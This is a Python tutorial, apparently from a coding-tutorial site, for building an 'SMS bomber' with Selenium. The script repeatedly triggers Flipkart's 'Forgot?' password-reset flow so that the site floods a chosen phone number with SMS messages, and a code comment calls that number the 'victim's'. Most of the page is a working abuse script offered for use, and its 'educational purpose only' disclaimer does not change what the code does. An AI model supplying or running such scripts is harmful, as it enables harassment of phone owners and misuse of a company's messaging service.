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Python | SMS Bomber using Selenium

Last Updated : 26 May, 2021
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Here, we are going to learn a simple SMS bomber trick (for fun and educational purpose). Selenium is a free tool for automated testing across different browsers. In this tutorial, we will learn to send automatically number of spam SMS for given number of frequency and interval.
Requirement: 
You need to install chromedriver and set path. Click here to download.
Below are the steps: 
 

  • First go to flipkart website using this Link.
  • Then click on inspect element by pressing ctrl + shift + i or going in setting of browser and clicking on inspect element manually.
  • Then find the class name of “Enter the number” input field and “Forgot?” link. We will use it later.

FInd class name of 'Ente the number' input fieldFind class name of 'Forgot?' link

  • Now, Run the script by putting appropriate class name for each element.
  • Now it will automatically send spam sms to your friend’s mobile number.

Note: This tutorial is for educational purpose only, please don’t use it for disturbing anyone or any unethical way.
Below is the implementation: 
 

Python3




from selenium import webdriver
import time
 
# create instance of Chrome webdriver
browser = webdriver.Chrome()
 
# set the frequency of sms which is approx maximum to 10 per 24 days
frequency = 10
 
# target mobile number, change it to victim's number and
# also ensure that it's registered on flipkart
mobile_number ="1234567890"
 
for i in range(frequency):
 
    # find the element where we have to
    # enter the number using the class name
    number = browser.find_element_by_xpath('//*[@id="container"]/div/div[3]/div/div[2]/div/form/div[1]/input')
 
    # automatically type the target number
    number.send_keys("1234567890")
     
    # find the element to send a forgot password
    # request using it's class name
    forgot = browser.find_element_by_link_text('Forgot?')
     
    # clicking on that element
    forgot.click()
     
    # set the interval to send each sms
    time.sleep(2)
     
# Close the browser
browser.quit()



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